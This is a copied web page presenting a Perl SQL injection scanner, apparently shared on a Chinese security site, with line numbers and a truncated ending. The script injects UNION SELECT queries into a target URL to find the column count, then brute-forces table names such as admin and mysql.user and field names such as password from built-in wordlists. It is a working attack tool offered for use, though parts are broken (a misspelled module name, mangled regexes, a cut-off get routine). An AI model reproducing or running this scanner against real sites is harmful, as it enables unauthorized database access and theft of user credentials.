字段和表段扫描perl版
1. #by 小杰 thanks for my all friends.
2. #578757691#163.com
3. #http://hi.baidu.com/hnnsg
4. #!/usr/bin/perl
5. #usage: perl perl.pl http://www...
6. use I:Socket;
7. $keywords="TOM";
8. $Dict_Table="Dict_Table.txt";
9. $Dict_Field="Dict_Field.txt";
10. @tabledic=
11.
12. ("name","pwd","jobs","links","users","username","usernames","mysql.user","member","members"
13.
14. ,"admin","administrator","administrators","login","logins","logon","userrights","superuser"
15.
16. ,"control","usercontrol","author","autore","artikel","newsletter","tb_user","tb_users","tb_
17.
18. username","tb_usernames","tb_admin","tb_administrator","tb_member","tb_members","tb_login",
19.
20. "perdorues","korisnici","webadmin","webadmins","webuser","webusers","webmaster","webmasters
21.
22. ","customer","customers","sysuser","sysusers","sysadmin","sysadmins","memberlist","tbluser"
23.
24. ,"tbl_user","tbl_users","a_admin","x_admin","m_admin","adminuser","admin_user","adm","useri
25.
26. nfo","user_info","admin_userinfo","userlist","user_list","user_admin","user_login","admin_u
27.
28. ser","admin_login","login_user","login_users","login_admin","login_admins","sitelogin","sit
29.
30. e_login","sitelogins","site_logins","SiteLogin","Site_Login","User","Users","Admin","Admins
31.
32. ","Login","Logins","adminrights","news","table","tables","perdoruesit");
33. @fielddic=
34.
35. ("admin","name","jobname","user","username","password","passwd","pass","email","emri","fjal
36.
37. ekalimi","pwd","user_name","user_password","name","id","user_pass","admin_user","admin_pass
38.
39. word","user_pass","admin_pass","usern","user_n","users","login","logins","login_user","logi
40.
41. n_admin","login_username","user_username","user_login","auid","apwd","adminid","admin_id","
42.
43. adminuser","admin_user","adminuserid","admin_userid","adminusername","admin_username","admi
44.
45. nname","admin_name","usr","usr_n","usrname","usr_name","usrpass","usr_pass","usrnam","nc","
46.
47. uid","userid","user_id","myusername","mail","emni","logohu","punonjes","kpro_user","wp_user
48.
49. s","emniplote","perdoruesi","perdorimi","punetoret","logini","llogaria","fjalekalimin","kod
50.
51. i","emer","ime","korisnik","korisnici","user1","administrator","administrator_name","mem_lo
52.
53. gin","login_password","login_pass","login_passwd","login_pwd","sifra","lozinka","psw","pass
54.
55. 1word","pass_word","passw","pass_w","user_passwd","userpass","userpassword","userpwd","user
56.
57. _pwd","useradmin","user_admin","mypassword","passwrd","admin_pwd","admin_pass","admin_passw
58.
59. d","mem_password","memlogin","userid","admin_id","adminid","e_mail","usrn","u_name","uname"
60.
61. ,"mempassword","mem_pass","mem_passwd","mem_pwd","p_word","pword","p_assword","myusername",
62.
63. "myname","my_username","my_name","my_password","my_email");
64.
65. if (!@ARGV){
66. print "please inset the url:";
67. chomp($url=<STDIN>);
68. }else{
69. $url=@ARGV[0];
70. }
71. if($url !~ /http:///) {
72. $url= "http://".$url;
73. }
74. $url =~ m/http://(.*?)/(.*)/;
75. my @url=();
76. my $lengh;
77. foreach $len(1..50)
78. {
79. $one=$url."/**/and/**/1=1/**/union/**/select/**/";
80. for($i=1;$i<=$len; $i++)
81. {
82. $one=$one.$i;
83. if($i==$len){
84. next;
85. }
86. $one=$one.",";
87. }
88. $one=$one."/*";
89. system("cls");
90. print "[+]scan field length... ";
91. print "$one ";
92. $data=get("$one");
93. #push @url,$one;
94. if($data=~/$keywords/)
95. {
96. $lengh=$len;
97. print "[-]field length is : $len ";
98. #print $data;
99. last;
100. }
101.
102. }
103. print "[+]start scan table... ";
104.
105. @tlist=gettextlist($Dict_Table);
106. @tabledic=(@tabledic,@tlist);
107. #print "@tabledic";
108.
109. @flist=gettextlist($Dict_Field);
110. @fielddic=(@tabledic,@flist);
111. #print "@fielddic";
112.
113.
114. foreach $table(@tabledic)
115. {
116. $two=$one."*/from/**/$table/*";
117. #print "$two ";
118. $data=get("$two");
119.
120. if($data=~/$keywords/)
121. {
122. #print "[-] $table ";
123. push @table,$table;
124.
125. }
126.
127.
128. }
129.
130. foreach(@table)
131. {
132. print "[-] $_ ";
133. }
134.
135. print "[+]start scan field... ";
136. print "[+]please inset you want to scan the table:";
137. chomp($tableone=<STDIN>);
138. print "[+]please check the field length:";
139. chomp($fieldindex=<STDIN>);
140.
141. if (!$tableone){
142. $tableone="mysql.user";
143. print " table is unset,value is set $tableone ";
144. }
145.
146. if (!$fieldindex){
147. $fieldindex="4";
148. print " the fieldindex is unset,value is set $fieldindex ";
149. }
150.
151. foreach $field(@fielddic)
152. {
153. local $three;
154. $three=$url."/**/and/**/1=1/**/union/**/select/**/";
155. #print " $lengh";
156. for($i=1;$i<=$lengh; $i++)
157. {
158.
159. if($i==$fieldindex)
160. {
161. $three=$three.$field;
162. $three=$three.",";
163. next;
164. }
165. $three=$three.$i;
166. if($i==$lengh){
167. next;
168. }
169. $three=$three.",";
170. }
171. $three=$three."/**/from/**/$tableone/*";
172. #print "$three";
173. $data=get("$three");
174. if($data=~/$keywords/)
175. {
176. print "[-] $field ";
177. push @field,$field;
178. }
179.
180. }
181.
182. foreach(@field)
183. {
184. print "[-] $_ ";
185. }
186.
187. print "------end------";
188.
189.
190. sub gettextlist()
191. {
192. my @textlist=();
193. my $textname=$_[0];
194. open FILE,$textname or die "Cant open $textname: $!";
195. foreach $lines(<FILE>)
196. {
197. chomp($lines);
198. push @textlist,$lines;
199. }
200. #print "@textlist";
201. return @textlist;
202.
203. }
204.
205.
206.
207. #thanks the google
208. sub timeout()
209. {
210. close $sock;
211. #die "timeout";
212. }
213.
214. sub get()
215. {
216. l
补充:综合编程 , 安全编程 ,
